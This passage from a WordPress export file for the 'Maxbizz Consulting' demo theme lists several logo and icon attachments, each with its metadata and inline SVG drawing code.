		<wp:post_date_gmt><![CDATA[2020-09-03 09:24:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>106</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/02_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#A4C1FF"></stop>
	<stop offset="1" style="stop-color:#4B83FC"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>symbol</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-2/symbol/</link>
		<pubDate>Thu, 03 Sep 2020 09:34:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/symbol.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>356</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:34:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:34:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[symbol]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>106</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/symbol.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/symbol.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 384"><path d="m343.59375 101.039062c-7.953125 3.847657-11.28125 13.417969-7.433594 21.367188 10.511719 21.714844 15.839844 45.121094 15.839844 69.59375 0 88.222656-71.777344 160-160 160s-160-71.777344-160-160 71.777344-160 160-160c36.558594 0 70.902344 11.9375 99.328125 34.519531 6.894531 5.503907 16.976563 4.351563 22.480469-2.566406 5.503906-6.914063 4.351562-16.984375-2.570313-22.480469-33.652343-26.746094-76-41.472656-119.238281-41.472656-105.863281 0-192 86.136719-192 192s86.136719 192 192 192 192-86.136719 192-192c0-29.335938-6.40625-57.449219-19.039062-83.527344-3.839844-7.96875-13.441407-11.289062-21.367188-7.433594zm0 0"></path><path d="m192 64c-8.832031 0-16 7.167969-16 16v112c0 8.832031 7.167969 16 16 16h80c8.832031 0 16-7.167969 16-16s-7.167969-16-16-16h-64v-96c0-8.832031-7.167969-16-16-16zm0 0"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>send</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/side-panel/send/</link>
		<pubDate>Thu, 03 Sep 2020 10:08:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/send.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>374</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:08:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:08:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[send]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>253</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/send.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/04/send.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-3/03_white/</link>
		<pubDate>Thu, 03 Sep 2020 10:09:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>377</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:09:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:09:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>182</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/03_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#F45555"></stop>
	<stop offset="1" style="stop-color:#D92300"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/ot_header_builders/header-4/04_black/</link>
		<pubDate>Thu, 03 Sep 2020 10:33:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>383</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:33:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:33:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>217</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/04_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#C0FFBF"></stop>
	<stop offset="1" style="stop-color:#55BB53"></stop>
</linearGradient>
